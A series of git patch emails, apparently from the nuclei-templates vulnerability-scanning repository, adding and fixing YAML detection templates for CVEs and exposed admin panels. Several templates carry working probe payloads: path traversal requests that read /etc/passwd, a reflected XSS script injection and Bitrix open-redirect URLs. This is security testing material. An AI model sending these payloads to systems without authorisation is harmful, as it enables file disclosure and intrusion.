1847/4083] Added CVE-2018-12095.yaml Template --- cves/2018/CVE-2018-12095.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2018/CVE-2018-12095.yaml diff --git a/cves/2018/CVE-2018-12095.yaml b/cves/2018/CVE-2018-12095.yaml new file mode 100644 index 0000000000..fa4f64630b --- /dev/null +++ b/cves/2018/CVE-2018-12095.yaml @@ -0,0 +1,32 @@ +id: CVE-2018-12095 + +info: + name: OEcms 3.1 - Cross-Site Scripting + author: Borna Nematzadeh + severity: medium + reference: | + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095 + - https://www.exploit-db.com/exploits/44895 + - https://cxsecurity.com/issue/WLB-2018060092 + tags: cve,cve2018,xss,OEcms + +requests: + - method: GET + path: + - '{{BaseURL}}/cms/info.php?mod=list' + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 From 70845edb9d62ebe9a0eefa91763de5191168103e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 24 Aug 2021 23:00:03 +0530 Subject: [PATCH 1848/4083] Create synology-web-station.yaml --- technologies/synology-web-station.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 technologies/synology-web-station.yaml diff --git a/technologies/synology-web-station.yaml b/technologies/synology-web-station.yaml new file mode 100644 index 0000000000..0493eb631b --- /dev/null +++ b/technologies/synology-web-station.yaml @@ -0,0 +1,22 @@ +id: synology-web-station + +info: + name: Synology Web Station + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7125 + tags: tech + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Hello! Welcome to Synology Web Station!' + - type: status + status: + - 200 From 701cc6abeb23e83ebdcbf41cb5a5498fbc2bfade Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 24 Aug 2021 23:04:31 +0530 Subject: [PATCH 1849/4083] Create web-service-panel.yaml --- exposed-panels/web-service-panel.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/web-service-panel.yaml diff --git a/exposed-panels/web-service-panel.yaml b/exposed-panels/web-service-panel.yaml new file mode 100644 index 0000000000..9a7d309981 --- /dev/null +++ b/exposed-panels/web-service-panel.yaml @@ -0,0 +1,22 @@ +id: web-service-panel + +info: + name: WEB SERVICE Panel + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7116 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'WEB SERVICE' + - type: status + status: + - 200 From 2285ce9faa759aa35af10ecd9f1de3140d29274d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 24 Aug 2021 23:09:26 +0530 Subject: [PATCH 1850/4083] Create lacie-panel.yaml --- exposed-panels/lacie-panel.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/lacie-panel.yaml diff --git a/exposed-panels/lacie-panel.yaml b/exposed-panels/lacie-panel.yaml new file mode 100644 index 0000000000..f98eb897cc --- /dev/null +++ b/exposed-panels/lacie-panel.yaml @@ -0,0 +1,22 @@ +id: lacie-panel + +info: + name: LaCie Login Panel + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7118 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/dashboard/' + + matchers-condition: and + matchers: + - type: word + words: + - 'id_LaCie' + - type: status + status: + - 200 From 65d9d8acb297ff994b207a71876e67305ebbfcef Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 24 Aug 2021 23:13:00 +0530 Subject: [PATCH 1851/4083] lint fix --- cves/2020/CVE-2020-11420.yaml | 17 ++++++++--------- 1 file changed, 8 insertions(+), 9 deletions(-) diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml index e418ec32b9..123a068098 100644 --- a/cves/2020/CVE-2020-11420.yaml +++ b/cves/2020/CVE-2020-11420.yaml @@ -5,15 +5,15 @@ info: author: socketz severity: medium description: | - A vulnerability exists in the UPS Adapter CS141 included in the versions 1.66 to 1.88. An attacker - with Admin or Engineer login credentials could exploit the vulnerability by manipulating variables that - reference files and by doing this achieve access to files and directories outside the web root folder. An - attacker may access arbitrary files and directories stored in the file system, but integrity of the files are - not jeopardized as attacker have read access rights only. This attack is commonly known as Path + A vulnerability exists in the UPS Adapter CS141 included in the versions 1.66 to 1.88. An attacker + with Admin or Engineer login credentials could exploit the vulnerability by manipulating variables that + reference files and by doing this achieve access to files and directories outside the web root folder. An + attacker may access arbitrary files and directories stored in the file system, but integrity of the files are + not jeopardized as attacker have read access rights only. This attack is commonly known as Path Traversal or Directory Traversal. - This Path Traversal vulnerability could be exploited only when Alarm Logs have been processed, + This Path Traversal vulnerability could be exploited only when Alarm Logs have been processed, and then you can exploit it, before that, you should wait. - reference: | + reference: - https://library.e.abb.com/public/ee46f3ff5823400f991ebd9bd43a297e/2CMT2020-005913%20Security%20Advisory%20CS141.pdf tags: cve,cve2020,iot,lfi @@ -31,5 +31,4 @@ requests: - type: regex regex: - "root:.*:0:0:" - part: body - + part: body \ No newline at end of file From 3c95101f5a205906e29ec2437f5e25d1dcba5776 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 25 Aug 2021 00:31:27 +0530 Subject: [PATCH 1852/4083] Update CVE-2020-11420.yaml --- cves/2020/CVE-2020-11420.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml index 123a068098..7a8affbb53 100644 --- a/cves/2020/CVE-2020-11420.yaml +++ b/cves/2020/CVE-2020-11420.yaml @@ -21,8 +21,10 @@ requests: - method: GET path: - "{{BaseURL}}/api/devices/ups/control?code=getAlarmData&alarmFileName=../etc/passwd" + headers: - - Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol=" + Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol=" + matchers-condition: and matchers: - type: status From d705fbd84bd910dd7d064da1746cb59c2741850b Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 25 Aug 2021 00:33:54 +0530 Subject: [PATCH 1853/4083] Update CVE-2020-11420.yaml --- cves/2020/CVE-2020-11420.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml index 7a8affbb53..be676408b1 100644 --- a/cves/2020/CVE-2020-11420.yaml +++ b/cves/2020/CVE-2020-11420.yaml @@ -23,7 +23,7 @@ requests: - "{{BaseURL}}/api/devices/ups/control?code=getAlarmData&alarmFileName=../etc/passwd" headers: - Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol=" + Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol=" matchers-condition: and matchers: From 2a3b20de2c97366a5ba85bacd793ffaa8b173882 Mon Sep 17 00:00:00 2001 From: Borna Nematzadeh <88947751+LogicalHunter@users.noreply.github.com> Date: Tue, 24 Aug 2021 12:27:07 -0700 Subject: [PATCH 1854/4083] Update CVE-2018-12095.yaml --- cves/2018/CVE-2018-12095.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-12095.yaml b/cves/2018/CVE-2018-12095.yaml index fa4f64630b..9cd62bafb4 100644 --- a/cves/2018/CVE-2018-12095.yaml +++ b/cves/2018/CVE-2018-12095.yaml @@ -2,7 +2,7 @@ id: CVE-2018-12095 info: name: OEcms 3.1 - Cross-Site Scripting - author: Borna Nematzadeh + author: LogicalHunter severity: medium reference: | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095 From 8fb3c65965d8c7d5a91067c541e4973054da40c9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 25 Aug 2021 01:32:14 +0530 Subject: [PATCH 1855/4083] template fix --- vulnerabilities/other/bitrix-open-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/bitrix-open-redirect.yaml b/vulnerabilities/other/bitrix-open-redirect.yaml index ebe3db78d6..d8b2d88748 100644 --- a/vulnerabilities/other/bitrix-open-redirect.yaml +++ b/vulnerabilities/other/bitrix-open-redirect.yaml @@ -21,7 +21,7 @@ requests: - '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com' - '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com' - '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com' - - '{{BaseURL}}bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com' + - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com' - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com' matchers-condition: and From 0276758096b2e5b874eb58601450221b1f611bb3 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 25 Aug 2021 01:37:17 +0530 Subject: [PATCH 1856/4083] minor update --- cves/2019/CVE-2019-15501.yaml | 2 +- cves/2019/CVE-2019-8937.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2019/CVE-2019-15501.yaml b/cves/2019/CVE-2019-15501.yaml index 8101dd4fbe..3481874161 100644 --- a/cves/2019/CVE-2019-15501.yaml +++ b/cves/2019/CVE-2019-15501.yaml @@ -2,7 +2,7 @@ id: CVE-2019-15501 info: name: LSoft ListServ - XSS - author: Borna Nematzadeh + author: LogicalHunter severity: medium reference: - https://www.exploit-db.com/exploits/47302 diff --git a/cves/2019/CVE-2019-8937.yaml b/cves/2019/CVE-2019-8937.yaml index 167c0a4d65..ee5c4a1fff 100644 --- a/cves/2019/CVE-2019-8937.yaml +++ b/cves/2019/CVE-2019-8937.yaml @@ -2,7 +2,7 @@ id: CVE-2019-8937 info: name: HotelDruid 2.3.0 - XSS - author: Borna Nematzadeh + author: LogicalHunter severity: medium refrense: https://www.exploit-db.com/exploits/46429 tags: cve,cve2019,xss,hoteldruid From f290b9f60d7aa2dc8d752605b12d46f327f8f5e2 Mon Sep 17 00:00:00 2001 From: socketz Date: Wed, 25 Aug 2021 07:55:46 +0200 Subject: [PATCH 1857/4083] Deleted duplicate and in wrong directory --- cves/2020/CVE-2019-9618.yaml | 26 -------------------------- 1 file changed, 26 deletions(-) delete mode 100644 cves/2020/CVE-2019-9618.yaml diff --git a/cves/2020/CVE-2019-9618.yaml b/cves/2020/CVE-2019-9618.yaml deleted file mode 100644 index bc0a6e0e6d..0000000000 --- a/cves/2020/CVE-2019-9618.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2019-9618 - -info: - name: GraceMedia Media Player 1.0 - Local File Inclusion - author: 0x_Akoko - severity: critical - reference: | - - https://www.exploit-db.com/exploits/46537 - - https://nvd.nist.gov/vuln/detail/CVE-2019-9618 - tags: cve,cve2019,wordpress,wp-plugin,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 \ No newline at end of file From 4cea960b71291da12cfc74791754fcfb6b9be2bb Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 25 Aug 2021 14:58:51 +0700 Subject: [PATCH 1858/4083] Create CVE-2010-1954.yaml --- cves/2010/CVE-2010-1954.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1954.yaml diff --git a/cves/2010/CVE-2010-1954.yaml b/cves/2010/CVE-2010-1954.yaml new file mode 100644 index 0000000000..15235070e6 --- /dev/null +++ b/cves/2010/CVE-2010-1954.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1954 + +info: + name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12287 + - https://www.cvedetails.com/cve/CVE-2010-1954 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 3528b01bbb85a276e47d1a03f7ad34a23057a6c2 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 25 Aug 2021 15:05:31 +0700 Subject: [PATCH 1859/4083] Create CVE-2010-1306.yaml --- cves/2010/CVE-2010-1306.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1306.yaml diff --git a/cves/2010/CVE-2010-1306.yaml b/cves/2010/CVE-2010-1306.yaml new file mode 100644 index 0000000000..7a3b6a6390 --- /dev/null +++ b/cves/2010/CVE-2010-1306.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1306 + +info: + name: Joomla! Component Picasa 2.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12058 + - https://www.cvedetails.com/cve/CVE-2010-1306 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 6c328909764b19f8f406163f49f3dec1eec112f8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 25 Aug 2021 16:17:51 +0530 Subject: [PATCH 1860/4083] Update honeywell-web-controller.yaml --- exposed-panels/honeywell-web-controller.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/honeywell-web-controller.yaml b/exposed-panels/honeywell-web-controller.yaml index 21a061ba40..332d7dc804 100644 --- a/exposed-panels/honeywell-web-controller.yaml +++ b/exposed-panels/honeywell-web-controller.yaml @@ -17,6 +17,7 @@ requests: - type: word words: - 'Honeywell XL Web Controller' + - type: status status: - 200 From cd81c9548e3c9014f36276b7272f062608199a54 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 25 Aug 2021 16:19:49 +0530 Subject: [PATCH 1861/4083] Update ibm-note-login.yaml --- exposed-panels/ibm-note-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/ibm-note-login.yaml b/exposed-panels/ibm-note-login.yaml index b91e156e27..a178a6d3b7 100644 --- a/exposed-panels/ibm-note-login.yaml +++ b/exposed-panels/ibm-note-login.yaml @@ -10,6 +10,7 @@ info: requests: - method: GET path: + - '{{BaseURL}}' - '{{BaseURL}}/names.nsf' matchers-condition: and From bd7953e01742738e9f71c82ff26d1d3acb78da91 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 25 Aug 2021 16:48:11 +0530 Subject: [PATCH 1862/4083] Update lacie-panel.yaml --- exposed-panels/lacie-panel.yaml | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/exposed-panels/lacie-panel.yaml b/exposed-panels/lacie-panel.yaml index f98eb897cc..09e63a143b 100644 --- a/exposed-panels/lacie-panel.yaml +++ b/exposed-panels/lacie-panel.yaml @@ -10,6 +10,7 @@ info: requests: - method: GET path: + - '{{BaseURL}}' - '{{BaseURL}}/dashboard/' matchers-condition: and @@ -17,6 +18,14 @@ requests: - type: word words: - 'id_LaCie' + part: body + + - type: regex + regex: + - '(?m)([a-zA-Z0-9&#; ]|)+Dashboard<\/title>$' + part: body + + - type: status status: - 200 From 6d2269f92c0508eaacb365598a5cdc3362696d82 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 25 Aug 2021 16:51:24 +0530 Subject: [PATCH 1863/4083] Update synology-web-station.yaml --- technologies/synology-web-station.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/technologies/synology-web-station.yaml b/technologies/synology-web-station.yaml index 0493eb631b..4f741bbd77 100644 --- a/technologies/synology-web-station.yaml +++ b/technologies/synology-web-station.yaml @@ -17,6 +17,7 @@ requests: - type: word words: - 'Hello! Welcome to Synology Web Station!' + - type: status status: - 200 From 0ef631dce102db77f5d848cc97eb3da0cbc77e7b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 25 Aug 2021 16:52:35 +0530 Subject: [PATCH 1864/4083] Update http-missing-security-headers.yaml --- misconfiguration/http-missing-security-headers.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml index 64db558b09..350fcbe9db 100644 --- a/misconfiguration/http-missing-security-headers.yaml +++ b/misconfiguration/http-missing-security-headers.yaml @@ -5,7 +5,7 @@ info: author: socketz severity: info description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty. - tags: config,headers,misconfiguration + tags: config,headers,misconfiguration,generic requests: - method: GET From 972ba7f4c28ce6ffad86a6c9779e4583b357800e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 25 Aug 2021 16:55:53 +0530 Subject: [PATCH 1865/4083] Update CVE-2018-12095.yaml --- cves/2018/CVE-2018-12095.yaml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/cves/2018/CVE-2018-12095.yaml b/cves/2018/CVE-2018-12095.yaml index 9cd62bafb4..eb04127534 100644 --- a/cves/2018/CVE-2018-12095.yaml +++ b/cves/2018/CVE-2018-12095.yaml @@ -4,16 +4,17 @@ info: name: OEcms 3.1 - Cross-Site Scripting author: LogicalHunter severity: medium - reference: | - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095 + description: A Reflected Cross-Site Scripting web vulnerability has been discovered in the OEcms v3.1 web-application. The vulnerability is located in the mod parameter of info.php. + reference: - https://www.exploit-db.com/exploits/44895 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095 - https://cxsecurity.com/issue/WLB-2018060092 - tags: cve,cve2018,xss,OEcms + tags: cve,cve2018,xss requests: - method: GET path: - - '{{BaseURL}}/cms/info.php?mod=list' + - '{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: @@ -23,9 +24,9 @@ requests: part: body - type: word - words: - - "text/html" part: header + words: + - text/html - type: status status: From c766a8454d24d6512ee21c793205113212ba2ded Mon Sep 17 00:00:00 2001 From: socketz Date: Wed, 25 Aug 2021 14:09:42 +0200 Subject: [PATCH 1866/4083] Fixed yaml linting errors --- cves/2012/CVE-2012-1835.yaml | 10 +++++----- cves/2018/CVE-2018-10818.yaml | 2 +- cves/2018/CVE-2018-10822.yaml | 2 +- cves/2019/CVE-2019-12616.yaml | 11 +++++------ cves/2019/CVE-2019-9618.yaml | 3 ++- cves/2020/CVE-2020-7209.yaml | 11 +++++------ cves/2020/CVE-2020-8813.yaml | 2 +- cves/2020/CVE-2020-9496.yaml | 13 ++++++------- misconfiguration/java-melody-exposed.yaml | 2 +- vulnerabilities/other/mcafee-epo-rce.yaml | 2 +- .../other/netgear-router-auth-bypass.yaml | 2 +- 11 files changed, 29 insertions(+), 31 deletions(-) diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml index 9bc5c08991..d92d5b7974 100644 --- a/cves/2012/CVE-2012-1835.yaml +++ b/cves/2012/CVE-2012-1835.yaml @@ -11,11 +11,11 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - "{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' matchers-condition: and matchers: diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml index 2562be9725..da59c53d73 100644 --- a/cves/2018/CVE-2018-10818.yaml +++ b/cves/2018/CVE-2018-10818.yaml @@ -4,7 +4,7 @@ info: name: LG NAS Devices - Remote Code Execution (Unauthenticated) author: gy741 severity: critical - description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter. + description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the "password" parameter. reference: | - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 diff --git a/cves/2018/CVE-2018-10822.yaml b/cves/2018/CVE-2018-10822.yaml index 17410d6679..7078f33dfc 100644 --- a/cves/2018/CVE-2018-10822.yaml +++ b/cves/2018/CVE-2018-10822.yaml @@ -4,7 +4,7 @@ info: name: D-Link Routers - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request. + description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request. reference: | - https://www.exploit-db.com/exploits/45678 - https://nvd.nist.gov/vuln/detail/CVE-2018-10822 diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml index 1c3352b08d..00eb781972 100644 --- a/cves/2019/CVE-2019-12616.yaml +++ b/cves/2019/CVE-2019-12616.yaml @@ -6,10 +6,10 @@ info: description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim. severity: medium tags: cve,cve2019,phpmyadmin,csrf - reference: | - - https://www.phpmyadmin.net/security/PMASA-2019-4/ - - https://www.exploit-db.com/exploits/46982 - - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 + reference: + - https://www.phpmyadmin.net/security/PMASA-2019-4/ + - https://www.exploit-db.com/exploits/46982 + - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 requests: - method: GET @@ -18,7 +18,6 @@ requests: matchers-condition: and matchers: - - type: word words: - "phpmyadmin.net" @@ -32,4 +31,4 @@ requests: - type: status status: - 200 - - 401 #password protected + - 401 # password protected diff --git a/cves/2019/CVE-2019-9618.yaml b/cves/2019/CVE-2019-9618.yaml index 5ed8f7c7f0..b74a1b1b13 100644 --- a/cves/2019/CVE-2019-9618.yaml +++ b/cves/2019/CVE-2019-9618.yaml @@ -8,6 +8,8 @@ info: reference: | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618 - https://seclists.org/fulldisclosure/2019/Mar/26 + - https://www.exploit-db.com/exploits/46537 + - https://nvd.nist.gov/vuln/detail/CVE-2019-9618 tags: cve,cve2019,wordpress,wp-plugin,lfi requests: @@ -17,7 +19,6 @@ requests: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" diff --git a/cves/2020/CVE-2020-7209.yaml b/cves/2020/CVE-2020-7209.yaml index 74841a4ce3..ab9f1ff023 100644 --- a/cves/2020/CVE-2020-7209.yaml +++ b/cves/2020/CVE-2020-7209.yaml @@ -11,12 +11,11 @@ info: http://packetstormsecurity.com/files/158025/LinuxKI-Toolset-6.01-Remote-Command-Execution.html https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-2 - # This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. - # The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability. - - # https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 - # vendor: https://www.hpe.com/us/en/home.html - # software: https://github.com/HewlettPackard/LinuxKI + # This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. + # The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability. + # https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 + # vendor: https://www.hpe.com/us/en/home.html + # software: https://github.com/HewlettPackard/LinuxKI requests: - method: GET diff --git a/cves/2020/CVE-2020-8813.yaml b/cves/2020/CVE-2020-8813.yaml index 586fc0dfb9..823b53f29c 100644 --- a/cves/2020/CVE-2020-8813.yaml +++ b/cves/2020/CVE-2020-8813.yaml @@ -4,7 +4,7 @@ info: name: Cacti v1.2.8 - Unauthenticated Remote Code Execution author: gy741 severity: critical - description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability + description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability reference: | - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/ tags: cve,cve2020,cacti,rce,oob diff --git a/cves/2020/CVE-2020-9496.yaml b/cves/2020/CVE-2020-9496.yaml index bf637b1ef7..e5f5e730c5 100644 --- a/cves/2020/CVE-2020-9496.yaml +++ b/cves/2020/CVE-2020-9496.yaml @@ -10,13 +10,12 @@ info: - http://packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html - http://packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.html - - # This template detects a Java deserialization vulnerability in Apache - # OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for - # versions prior to 17.12.04. - # -- - # References: - # - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz + # This template detects a Java deserialization vulnerability in Apache + # OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for + # versions prior to 17.12.04. + # -- + # References: + # - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz requests: - raw: diff --git 